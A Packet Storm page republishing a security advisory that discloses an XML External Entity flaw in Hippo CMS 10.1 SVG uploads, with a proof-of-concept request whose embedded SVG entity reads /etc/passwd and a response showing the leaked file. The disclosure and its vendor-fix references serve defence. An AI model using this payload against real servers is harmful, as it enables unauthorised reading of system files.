exploit the possibilities

Hippo CMS 10.1 XML External Entity Information Disclosure

Hippo CMS 10.1 XML External Entity Information Disclosure
Posted Jan 31, 2016
Authored by LiquidWorm | Site zeroscience.mk

Hippo CMS version 10.1 suffers from an XML External Entity information disclosure vulnerability.

tags | exploit, info disclosure, xxe
MD5 | 8cc0a4b83b313629f974505430725fde

Hippo CMS 10.1 XML External Entity Information Disclosure

Change Mirror Download

Hippo CMS 10.1 XML External Entity Information Disclosure Vulnerability


Vendor: Hippo B.V.
Product web page: http://www.onehippo.org
Affected version: 10.1, 7.9 and 7.8 (Enterprise Edition)

Summary: Hippo CMS is an open source Java CMS. We built it so you
can easily integrate it into your existing architecture.

Desc: XXE (XML External Entity) processing through upload of SVG
images in the CMS, and through XML import in the CMS Console application.

Tested on: Linux 2.6.32-5-xen-amd64
Java/1.8.0_66
Apache-Coyote/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5301
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5301.php

Vendor: http://www.onehippo.org/security-issues-list/security-12.html
http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html


04.12.2015

---


[Request]:


POST /?1-8.IBehaviorListener.0-root-tabs-panel~container-cards-2-panel-center-tabs-panel~container-cards-3-panel-editor-extension.editor-form-template-view-3-item-view-1-item-extension.upload-fileUpload-form-fileUpload HTTP/1.1
Host: 10.0.2.17
User-Agent: ZSL_Web_Scanner/2.8
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://10.0.2.17/?1&path=/content/gallery/test4.svg
Content-Length: 2101
Content-Type: multipart/form-data; boundary=---------------------------20443294602274
Cookie: [OMMITED]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache


-----------------------------20443294602274
Content-Disposition: form-data; name="id1a0_hf_0"


-----------------------------20443294602274
Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:1:item
:view:1:item:value:widget"


-----------------------------20443294602274
Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item
:view:1:item:view:1:item:view:1:item:value:widget"


-----------------------------20443294602274
Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item
:view:1:item:view:2:item:view:1:item:value:widget"


-----------------------------20443294602274
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
:view:1:item:view:1:item:value:widget"

asd
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
:view:2:item:view:1:item:value:widget"

hhh
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
:view:3:item:view:1:item:panel:editor"


-----------------------------20443294602274
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right
:view:2:item:view:1:item:value:widget"

hhh
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right
:view:3:item:view:1:item:value:widget"

hhhh
-----------------------------20443294602274
Content-Disposition: form-data; name="files[]"; filename="svgupload2.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="yes"?><!DOCTYPE zsl [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]
><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999
/xlink" version="1.1">&xxe;</svg>
-----------------------------20443294602274--



[Response]:


<?xml version="1.0" encoding="UTF-8"?><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www
.w3.org/1999/xlink" height="7" version="1.1" viewBox="0 0 500.0 40.0" width="98">
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
***
***
***
***
</svg>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

March 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    15 Files
  • 2
    Mar 2nd
    5 Files
  • 3
    Mar 3rd
    3 Files
  • 4
    Mar 4th
    25 Files
  • 5
    Mar 5th
    20 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    12 Files
  • 9
    Mar 9th
    3 Files
  • 10
    Mar 10th
    4 Files
  • 11
    Mar 11th
    23 Files
  • 12
    Mar 12th
    12 Files
  • 13
    Mar 13th
    12 Files
  • 14
    Mar 14th
    19 Files
  • 15
    Mar 15th
    12 Files
  • 16
    Mar 16th
    3 Files
  • 17
    Mar 17th
    1 Files
  • 18
    Mar 18th
    15 Files
  • 19
    Mar 19th
    22 Files
  • 20
    Mar 20th
    14 Files
  • 21
    Mar 21st
    8 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close